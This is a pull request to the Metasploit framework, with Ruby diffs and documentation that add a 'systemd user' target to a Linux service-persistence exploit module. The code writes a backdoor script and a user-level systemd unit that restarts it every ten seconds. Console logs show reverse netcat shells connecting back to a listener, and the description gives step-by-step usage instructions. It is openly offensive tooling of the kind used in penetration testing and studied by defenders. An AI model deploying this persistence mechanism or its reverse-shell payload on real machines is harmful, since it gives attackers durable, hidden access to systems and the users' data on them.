### PR TITLE
Add systemd unprivileged user persistence

### DIFF
--- a/documentation/modules/exploit/linux/local/service_persistence.md
+++ b/documentation/modules/exploit/linux/local/service_persistence.md
@@ -5,9 +5,10 @@
 1. Kali 2.0 (System V)
 2. Ubuntu 14.04 (Upstart)
 3. Ubuntu 16.04 (systemd)
-4. Centos 5 (System V)
-5. Fedora 18 (systemd)
-6. Fedora 20 (systemd)
+4. Ubuntu 16.04 (systemd user)
+5. Centos 5 (System V)
+6. Fedora 18 (systemd)
+7. Fedora 20 (systemd)
 
 ## Verification Steps
 
@@ -253,16 +254,16 @@ Now with a multi handler, we can catch systemd restarting the process every 10se
     [*] Starting the payload handler...
     [*] Command shell session 8 opened (192.168.199.128:4444 -> 192.168.199.130:47056) at 2016-06-22 10:37:30 -0400
 
-### systemd user
+### systemd (Ubuntu 16.04 Server - vagrant)
 
-    msf5 exploit(linux/local/service_persistence) > show options
+    msf5 exploit(linux/local/service_persistence) > options
 
     Module options (exploit/linux/local/service_persistence):
 
        Name        Current Setting  Required  Description
        ----        ---------------  --------  -----------
        SERVICE                      no        Name of service to create
-       SESSION     1                yes       The session to run this module on.
+       SESSION     -1               yes       The session to run this module on.
        SHELLPATH   /tmp             yes       Writable path to put our shell
        SHELL_NAME                   no        Name of shell file to write
 
@@ -271,8 +272,8 @@ Now with a multi handler, we can catch systemd restarting the process every 10se
 
        Name   Current Setting  Required  Description
        ----   ---------------  --------  -----------
-       LHOST  127.0.0.1        yes       The listen address (an interface may be specified)
-       LPORT  4445             yes       The listen port
+       LHOST  172.28.128.1     yes       The listen address (an interface may be specified)
+       LPORT  4444             yes       The listen port
 
 
     Exploit target:
@@ -285,33 +286,20 @@ Now with a multi handler, we can catch systemd restarting the process every 10se
     msf5 exploit(linux/local/service_persistence) > run
 
     [!] SESSION may not be compatible with this module.
-    [!] You are binding to a loopback address by setting LHOST to 127.0.0.1. Did you want
-    ReverseListenerBindAddress?
-    [*] Started reverse TCP handler on 127.0.0.1:4445
-    [*] Command shell session 2 opened (127.0.0.1:4445 -> 127.0.0.1:54344) at 2019-02-15 1
-    5:45:16 -0500
-
-    id
-    uid=1000(cblack) gid=1000(cblack) groups=1000(cblack),27(sudo),117(postgres)
-    exit
-    [*] 127.0.0.1 - Command shell session 2 closed.
-    msf5 exploit(linux/local/service_persistence) > set VERBOSE true
-    VERBOSE => true
-    msf5 exploit(linux/local/service_persistence) > run
-
-    [!] SESSION may not be compatible with this module.
-    [!] You are binding to a loopback address by setting LHOST to 127.0.0.1. Did you want
-    ReverseListenerBindAddress?
-    [*] Started reverse TCP handler on 127.0.0.1:4445
-    [*] Writing backdoor to /tmp/iEucd
-    [*] Writing service: /home/cblack/.config/systemd/user/uKxHqmV.service
+    [*] Started reverse TCP handler on 172.28.128.1:4444
+    [*] Writing backdoor to /tmp/PPpCF
+    [*] Max line length is 65537
+    [*] Writing 94 bytes in 1 chunks of 330 bytes (octal-encoded), using printf
+    [*] Creating user service directory
+    [*] Writing service: /home/vagrant/.config/systemd/user/OzzdRBC.service
+    [*] Max line length is 65537
+    [*] Writing 203 bytes in 1 chunks of 778 bytes (octal-encoded), using printf
     [*] Reloading manager configuration
     [*] Enabling service
-    [*] Starting service: uKxHqmV
-    [*] Command shell session 3 opened (127.0.0.1:4445 -> 127.0.0.1:54358) at 2019-02-15 1
-    5:45:30 -0500
+    [*] Starting service: OzzdRBC
+    [*] Command shell session 2 opened (172.28.128.1:4444 -> 172.28.128.3:52564) at 2019-03-06 00:22:40 -0600
 
-    echo hi lennart
-    hi lennart
-    exit
-    [*] 127.0.0.1 - Command shell session 3 closed.
+    id
+    uid=1000(vagrant) gid=1000(vagrant) groups=1000(vagrant)
+    uname -a
+    Linux ubuntu-xenial 4.4.0-141-generic #167-Ubuntu SMP Wed Dec 5 10:40:15 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux

--- a/documentation/modules/exploit/linux/local/service_persistence.md
+++ b/documentation/modules/exploit/linux/local/service_persistence.md
@@ -36,7 +36,7 @@
 0. Automatic: Detect the service handler automatically based on running `which` to find the admin binaries
 1. System V: There is no automated restart, so while you'll get a shell, if it crashes, you'll need to wait for a init shift to restart the process automatically (like a reboot).  This logs to syslog or /var/log/<process>.log and .err
 2. Upstart: Logs to its own file.  This module is set to restart the shell after a 10sec pause, and do this forever.
-3. systemd: This module is set to restart the shell after a 10sec pause, and do this forever.
+3. systemd and systemd user: This module is set to restart the shell after a 10sec pause, and do this forever.
 
 **SHELLPATH**
   
@@ -252,3 +252,66 @@ Now with a multi handler, we can catch systemd restarting the process every 10se
     [*] Started reverse handler on 192.168.199.128:4444 
     [*] Starting the payload handler...
     [*] Command shell session 8 opened (192.168.199.128:4444 -> 192.168.199.130:47056) at 2016-06-22 10:37:30 -0400
+
+### systemd user
+
+    msf5 exploit(linux/local/service_persistence) > show options
+
+    Module options (exploit/linux/local/service_persistence):
+
+       Name        Current Setting  Required  Description
+       ----        ---------------  --------  -----------
+       SERVICE                      no        Name of service to create
+       SESSION     1                yes       The session to run this module on.
+       SHELLPATH   /tmp             yes       Writable path to put our shell
+       SHELL_NAME                   no        Name of shell file to write
+
+
+    Payload options (cmd/unix/reverse_netcat):
+
+       Name   Current Setting  Required  Description
+       ----   ---------------  --------  -----------
+       LHOST  127.0.0.1        yes       The listen address (an interface may be specified)
+       LPORT  4445             yes       The listen port
+
+
+    Exploit target:
+
+       Id  Name
+       --  ----
+       4   systemd user
+
+
+    msf5 exploit(linux/local/service_persistence) > run
+
+    [!] SESSION may not be compatible with this module.
+    [!] You are binding to a loopback address by setting LHOST to 127.0.0.1. Did you want
+    ReverseListenerBindAddress?
+    [*] Started reverse TCP handler on 127.0.0.1:4445
+    [*] Command shell session 2 opened (127.0.0.1:4445 -> 127.0.0.1:54344) at 2019-02-15 1
+    5:45:16 -0500
+
+    id
+    uid=1000(cblack) gid=1000(cblack) groups=1000(cblack),27(sudo),117(postgres)
+    exit
+    [*] 127.0.0.1 - Command shell session 2 closed.
+    msf5 exploit(linux/local/service_persistence) > set VERBOSE true
+    VERBOSE => true
+    msf5 exploit(linux/local/service_persistence) > run
+
+    [!] SESSION may not be compatible with this module.
+    [!] You are binding to a loopback address by setting LHOST to 127.0.0.1. Did you want
+    ReverseListenerBindAddress?
+    [*] Started reverse TCP handler on 127.0.0.1:4445
+    [*] Writing backdoor to /tmp/iEucd
+    [*] Writing service: /home/cblack/.config/systemd/user/uKxHqmV.service
+    [*] Reloading manager configuration
+    [*] Enabling service
+    [*] Starting service: uKxHqmV
+    [*] Command shell session 3 opened (127.0.0.1:4445 -> 127.0.0.1:54358) at 2019-02-15 1
+    5:45:30 -0500
+
+    echo hi lennart
+    hi lennart
+    exit
+    [*] 127.0.0.1 - Command shell session 3 closed.

--- a/documentation/modules/exploit/linux/local/service_persistence.md
+++ b/documentation/modules/exploit/linux/local/service_persistence.md
@@ -254,7 +254,7 @@ Now with a multi handler, we can catch systemd restarting the process every 10se
     [*] Starting the payload handler...
     [*] Command shell session 8 opened (192.168.199.128:4444 -> 192.168.199.130:47056) at 2016-06-22 10:37:30 -0400
 
-### systemd (Ubuntu 16.04 Server - vagrant)
+### systemd user (Ubuntu 16.04 Server - vagrant)
 
     msf5 exploit(linux/local/service_persistence) > options
 

--- a/modules/exploits/linux/local/service_persistence.rb
+++ b/modules/exploits/linux/local/service_persistence.rb
@@ -46,7 +46,8 @@ class MetasploitModule < Msf::Exploit::Local
             ['Auto',     {}],
             ['System V', { :runlevel => '2 3 4 5' }],
             ['Upstart',  { :runlevel => '2345' }],
-            ['systemd',  {}]
+            ['systemd',  {}],
+            ['systemd user',  {}]
           ],
         'DefaultTarget'  => 0,
         'Arch'           => ARCH_CMD,
@@ -77,6 +78,11 @@ class MetasploitModule < Msf::Exploit::Local
         OptString.new('SERVICE', [false, 'Name of service to create'])
       ], self.class
     )
+    register_advanced_options(
+      [
+          OptBool.new('ENABLE', [true, 'Enable the service', true])
+      ], self.class
+    )
   end
 
   def exploit
@@ -93,6 +99,8 @@ class MetasploitModule < Msf::Exploit::Local
       upstart(path, file, target.opts[:runlevel])
     when 'systemd'
       systemd(path, file)
+    when 'systemd user'
+      systemd_user(path, file)
     else
       if service_system_exists?('systemctl')
         print_status('Utilizing systemd')
@@ -154,10 +162,55 @@ WantedBy=multi-user.target}
       print_error('File not written, check permissions.')
       return
     end
-    vprint_status('Enabling service')
-    cmd_exec("systemctl enable #{service_filename}.service")
+    if datastore['ENABLE']
+      vprint_status('Enabling service')
+      cmd_exec("systemctl enable #{service_filename}.service")
+    end
     vprint_status('Starting service')
     cmd_exec("systemctl start #{service_filename}.service")
+  end
+
+  def systemd_user(backdoor_path, backdoor_file)
+    script = %{[Unit]
+Description=Start daemon at boot time
+After=
+Requires=
+[Service]
+RemainAfterExit=yes
+RestartSec=10s
+Restart=always
+TimeoutStartSec=5
+ExecStart=/bin/sh #{backdoor_path}/#{backdoor_file}
+[Install]
+WantedBy=default.target}
+
+    service_filename = datastore['SERVICE'] ? datastore['SERVICE'] : Rex::Text.rand_text_alpha(7)
+    home = cmd_exec('echo ${HOME}')
+    service_name = "#{home}/.config/systemd/user/#{service_filename}.service"
+    vprint_status("Writing service: #{service_name}")
+    write_file(service_name, script)
+    if !file_exist?(service_name)
+      print_error('File not written, check permissions. Attempting secondary location')
+      service_name = "#{home}/.local/share/systemd/user/#{service_filename}.service"
+      vprint_status("Writing .local service: #{service_name}")
+      write_file(service_name, script)
+      if !file_exist?(service_name)
+        print_error('File not written, check permissions.')
+        return
+      end
+    end
+    # This was taken from pam_systemd(8)
+    systemd_socket_id = cmd_exec('id -u')
+    systemd_socket_dir = "/run/user/#{systemd_socket_id}"
+    vprint_status('Reloading manager configuration')
+    cmd_exec("XDG_RUNTIME_DIR=#{systemd_socket_dir} systemctl --user daemon-reload")
+    if datastore['ENABLE']
+      vprint_status('Enabling service')
+      cmd_exec("XDG_RUNTIME_DIR=#{systemd_socket_dir} systemctl --user enable #{service_filename}.service")
+    end
+    vprint_status("Starting service: #{service_filename}")
+    # Prefer restart over start, as it will execute already existing service files
+    cmd_exec("XDG_RUNTIME_DIR=#{systemd_socket_dir} systemctl --user restart #{service_filename}")
   end
 
   def upstart(backdoor_path, backdoor_file, runlevel)

--- a/modules/exploits/linux/local/service_persistence.rb
+++ b/modules/exploits/linux/local/service_persistence.rb
@@ -38,7 +38,8 @@ class MetasploitModule < Msf::Exploit::Local
         'License'        => MSF_LICENSE,
         'Author'         =>
           [
-            'h00die <mike@shorebreaksecurity.com>'
+            'h00die <mike@shorebreaksecurity.com>',
+            'Cale Black' # systemd user target
           ],
         'Platform'       => ['unix', 'linux'],
         'Targets'        =>
@@ -76,11 +77,11 @@ class MetasploitModule < Msf::Exploit::Local
         OptPath.new('SHELLPATH', [true, 'Writable path to put our shell', '/usr/local/bin']),
         OptString.new('SHELL_NAME', [false, 'Name of shell file to write']),
         OptString.new('SERVICE', [false, 'Name of service to create'])
-      ], self.class
+      ]
     )
     register_advanced_options(
       [
-          OptBool.new('EnableService', [true, 'Enable the service', true])
+        OptBool.new('EnableService', [true, 'Enable the service', true])
       ]
     )
   end
@@ -209,7 +210,6 @@ WantedBy=multi-user.target}
         print_error('File not written, check permissions.')
         return
       end
-
     end
 
     # This was taken from pam_systemd(8)

--- a/modules/exploits/linux/local/service_persistence.rb
+++ b/modules/exploits/linux/local/service_persistence.rb
@@ -80,8 +80,8 @@ class MetasploitModule < Msf::Exploit::Local
     )
     register_advanced_options(
       [
-          OptBool.new('Enable', [true, 'Enable the service', true])
-      ], self.class
+          OptBool.new('EnableService', [true, 'Enable the service', true])
+      ]
     )
   end
 
@@ -162,7 +162,7 @@ WantedBy=multi-user.target}
       print_error('File not written, check permissions.')
       return
     end
-    if datastore['Enable']
+    if datastore['EnableService']
       vprint_status('Enabling service')
       cmd_exec("systemctl enable #{service_filename}.service")
     end
@@ -172,43 +172,50 @@ WantedBy=multi-user.target}
 
   def systemd_user(backdoor_path, backdoor_file)
     script = <<~EOF
-	[Unit]
-	Description=Start daemon at boot time
-	After=
-	Requires=
-	[Service]
-	RemainAfterExit=yes
-	RestartSec=10s
-	Restart=always
-	TimeoutStartSec=5
-	ExecStart=/bin/sh #{backdoor_path}/#{backdoor_file}
-	[Install]
-	WantedBy=default.target
-	EOF
+      [Unit]
+      Description=Start daemon at boot time
+      After=
+      Requires=
+      [Service]
+      RemainAfterExit=yes
+      RestartSec=10s
+      Restart=always
+      TimeoutStartSec=5
+      ExecStart=/bin/sh #{backdoor_path}/#{backdoor_file}
+      [Install]
+      WantedBy=default.target
+    EOF
     service_filename = datastore['SERVICE'] ? datastore['SERVICE'] : Rex::Text.rand_text_alpha(7)
+
     home = cmd_exec('echo ${HOME}')
     service_name = "#{home}/.config/systemd/user/#{service_filename}.service"
     vprint_status("Writing service: #{service_name}")
     write_file(service_name, script)
+
     if !file_exist?(service_name)
       print_error('File not written, check permissions. Attempting secondary location')
       service_name = "#{home}/.local/share/systemd/user/#{service_filename}.service"
       vprint_status("Writing .local service: #{service_name}")
       write_file(service_name, script)
+
       if !file_exist?(service_name)
         print_error('File not written, check permissions.')
         return
       end
+
     end
+
     # This was taken from pam_systemd(8)
     systemd_socket_id = cmd_exec('id -u')
     systemd_socket_dir = "/run/user/#{systemd_socket_id}"
     vprint_status('Reloading manager configuration')
     cmd_exec("XDG_RUNTIME_DIR=#{systemd_socket_dir} systemctl --user daemon-reload")
-    if datastore['Enable']
+
+    if datastore['EnableService']
       vprint_status('Enabling service')
       cmd_exec("XDG_RUNTIME_DIR=#{systemd_socket_dir} systemctl --user enable #{service_filename}.service")
     end
+
     vprint_status("Starting service: #{service_filename}")
     # Prefer restart over start, as it will execute already existing service files
     cmd_exec("XDG_RUNTIME_DIR=#{systemd_socket_dir} systemctl --user restart #{service_filename}")

--- a/modules/exploits/linux/local/service_persistence.rb
+++ b/modules/exploits/linux/local/service_persistence.rb
@@ -44,11 +44,31 @@ class MetasploitModule < Msf::Exploit::Local
         'Platform'       => ['unix', 'linux'],
         'Targets'        =>
           [
-            ['Auto',     {}],
-            ['System V', { :runlevel => '2 3 4 5' }],
-            ['Upstart',  { :runlevel => '2345' }],
-            ['systemd',  {}],
-            ['systemd user',  {}]
+            ['Auto', 'DefaultOptions' =>
+              {
+                'SHELLPATH' => '/usr/local/bin'
+              }
+            ],
+            ['System V', :runlevel => '2 3 4 5', 'DefaultOptions' =>
+              {
+                'SHELLPATH' => '/usr/local/bin'
+              }
+            ],
+            ['Upstart', :runlevel => '2345', 'DefaultOptions' =>
+              {
+                'SHELLPATH' => '/usr/local/bin'
+              }
+            ],
+            ['systemd', 'DefaultOptions' =>
+              {
+                'SHELLPATH' => '/usr/local/bin'
+              }
+            ],
+            ['systemd user', 'DefaultOptions' =>
+              {
+                'SHELLPATH' => '/tmp'
+              }
+            ]
           ],
         'DefaultTarget'  => 0,
         'Arch'           => ARCH_CMD,

--- a/modules/exploits/linux/local/service_persistence.rb
+++ b/modules/exploits/linux/local/service_persistence.rb
@@ -188,12 +188,19 @@ WantedBy=multi-user.target}
     service_filename = datastore['SERVICE'] ? datastore['SERVICE'] : Rex::Text.rand_text_alpha(7)
 
     home = cmd_exec('echo ${HOME}')
+    vprint_status("Creating user service directory")
+    cmd_exec("mkdir -p #{home}/.config/systemd/user")
+
     service_name = "#{home}/.config/systemd/user/#{service_filename}.service"
     vprint_status("Writing service: #{service_name}")
+
     write_file(service_name, script)
 
     if !file_exist?(service_name)
       print_error('File not written, check permissions. Attempting secondary location')
+      vprint_status("Creating user secondary service directory")
+      cmd_exec("mkdir -p #{home}/.local/share/systemd/user")
+
       service_name = "#{home}/.local/share/systemd/user/#{service_filename}.service"
       vprint_status("Writing .local service: #{service_name}")
       write_file(service_name, script)

--- a/modules/exploits/linux/local/service_persistence.rb
+++ b/modules/exploits/linux/local/service_persistence.rb
@@ -171,8 +171,7 @@ WantedBy=multi-user.target}
   end
 
   def systemd_user(backdoor_path, backdoor_file)
-    def script 
-	<<~EOF
+    script = <<~EOF
 	[Unit]
 	Description=Start daemon at boot time
 	After=
@@ -186,7 +185,6 @@ WantedBy=multi-user.target}
 	[Install]
 	WantedBy=default.target
 	EOF
-    end
     service_filename = datastore['SERVICE'] ? datastore['SERVICE'] : Rex::Text.rand_text_alpha(7)
     home = cmd_exec('echo ${HOME}')
     service_name = "#{home}/.config/systemd/user/#{service_filename}.service"

--- a/modules/exploits/linux/local/service_persistence.rb
+++ b/modules/exploits/linux/local/service_persistence.rb
@@ -80,7 +80,7 @@ class MetasploitModule < Msf::Exploit::Local
     )
     register_advanced_options(
       [
-          OptBool.new('ENABLE', [true, 'Enable the service', true])
+          OptBool.new('Enable', [true, 'Enable the service', true])
       ], self.class
     )
   end
@@ -162,7 +162,7 @@ WantedBy=multi-user.target}
       print_error('File not written, check permissions.')
       return
     end
-    if datastore['ENABLE']
+    if datastore['Enable']
       vprint_status('Enabling service')
       cmd_exec("systemctl enable #{service_filename}.service")
     end
@@ -171,19 +171,22 @@ WantedBy=multi-user.target}
   end
 
   def systemd_user(backdoor_path, backdoor_file)
-    script = %{[Unit]
-Description=Start daemon at boot time
-After=
-Requires=
-[Service]
-RemainAfterExit=yes
-RestartSec=10s
-Restart=always
-TimeoutStartSec=5
-ExecStart=/bin/sh #{backdoor_path}/#{backdoor_file}
-[Install]
-WantedBy=default.target}
-
+    def script 
+	<<~EOF
+	[Unit]
+	Description=Start daemon at boot time
+	After=
+	Requires=
+	[Service]
+	RemainAfterExit=yes
+	RestartSec=10s
+	Restart=always
+	TimeoutStartSec=5
+	ExecStart=/bin/sh #{backdoor_path}/#{backdoor_file}
+	[Install]
+	WantedBy=default.target
+	EOF
+    end
     service_filename = datastore['SERVICE'] ? datastore['SERVICE'] : Rex::Text.rand_text_alpha(7)
     home = cmd_exec('echo ${HOME}')
     service_name = "#{home}/.config/systemd/user/#{service_filename}.service"
@@ -204,7 +207,7 @@ WantedBy=default.target}
     systemd_socket_dir = "/run/user/#{systemd_socket_id}"
     vprint_status('Reloading manager configuration')
     cmd_exec("XDG_RUNTIME_DIR=#{systemd_socket_dir} systemctl --user daemon-reload")
-    if datastore['ENABLE']
+    if datastore['Enable']
       vprint_status('Enabling service')
       cmd_exec("XDG_RUNTIME_DIR=#{systemd_socket_dir} systemctl --user enable #{service_filename}.service")
     end


### PR DESCRIPTION
These changes add a new target to the Linux service persistence for "systemd user", which (if supported) will invoke `systemctl --user` which allows non-administrative users to run service files.

At the moment I only implimented the functionality to match the original systemd persistence features, but realistically it is possible to enforce different mechanisms for things like user logins, logouts, and a pile more as documented in `systemd.unit(5)`. I have a [small write up](https://hosakacorp.net/p/systemd-user.html) from ages ago that has some more sophisticated examples.

It should be noted that a couple of things I noticed, `SHELLPATH` should probably change when the target is selected as the default is expecting a administrative user with access to `/usr/local/bin`. Additionally, the behavior of enabling a service without any option to disable it freaked me out a bit, so I added that as an advanced option.

```
msf5 exploit(linux/local/service_persistence) > show options

Module options (exploit/linux/local/service_persistence):

   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   SERVICE                      no        Name of service to create
   SESSION     1                yes       The session to run this module on.
   SHELLPATH   /tmp             yes       Writable path to put our shell
   SHELL_NAME                   no        Name of shell file to write


Payload options (cmd/unix/reverse_netcat):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  127.0.0.1        yes       The listen address (an interface may be specified)
   LPORT  4445             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   4   systemd user


msf5 exploit(linux/local/service_persistence) > run

[!] SESSION may not be compatible with this module.
[!] You are binding to a loopback address by setting LHOST to 127.0.0.1. Did you want
ReverseListenerBindAddress?
[*] Started reverse TCP handler on 127.0.0.1:4445
[*] Command shell session 2 opened (127.0.0.1:4445 -> 127.0.0.1:54344) at 2019-02-15 1
5:45:16 -0500

id
uid=1000(cblack) gid=1000(cblack) groups=1000(cblack),27(sudo),117(postgres)
exit
[*] 127.0.0.1 - Command shell session 2 closed.
msf5 exploit(linux/local/service_persistence) > set VERBOSE true
VERBOSE => true
msf5 exploit(linux/local/service_persistence) > run

[!] SESSION may not be compatible with this module.
[!] You are binding to a loopback address by setting LHOST to 127.0.0.1. Did you want
ReverseListenerBindAddress?
[*] Started reverse TCP handler on 127.0.0.1:4445
[*] Writing backdoor to /tmp/iEucd
[*] Writing service: /home/cblack/.config/systemd/user/uKxHqmV.service
[*] Reloading manager configuration
[*] Enabling service
[*] Starting service: uKxHqmV
[*] Command shell session 3 opened (127.0.0.1:4445 -> 127.0.0.1:54358) at 2019-02-15 1
5:45:30 -0500

echo hi lennart
hi lennart
exit
[*] 127.0.0.1 - Command shell session 3 closed.
```
## Verification
List the steps needed to make sure this thing works

- [ ] Start `msfconsole`
- [ ] Execute a meterpreter shell on your Linux target and get a session
- [ ] `use linux/local/service_persistence`
- [ ] `set SESSION 1`
- [ ] `set TARGET 4` - for `systemd user` targets
- [ ] `set SHELLPATH /tmp` - The rest of the targets expect a administratively writable directory 
- [ ] `use PAYLOAD cmd/unix/reverse_netcat`
- [ ] set appropriate `LHOST` and `LPORT`
- [ ] (optionally) `set ENABLE false`
- [ ] `execute`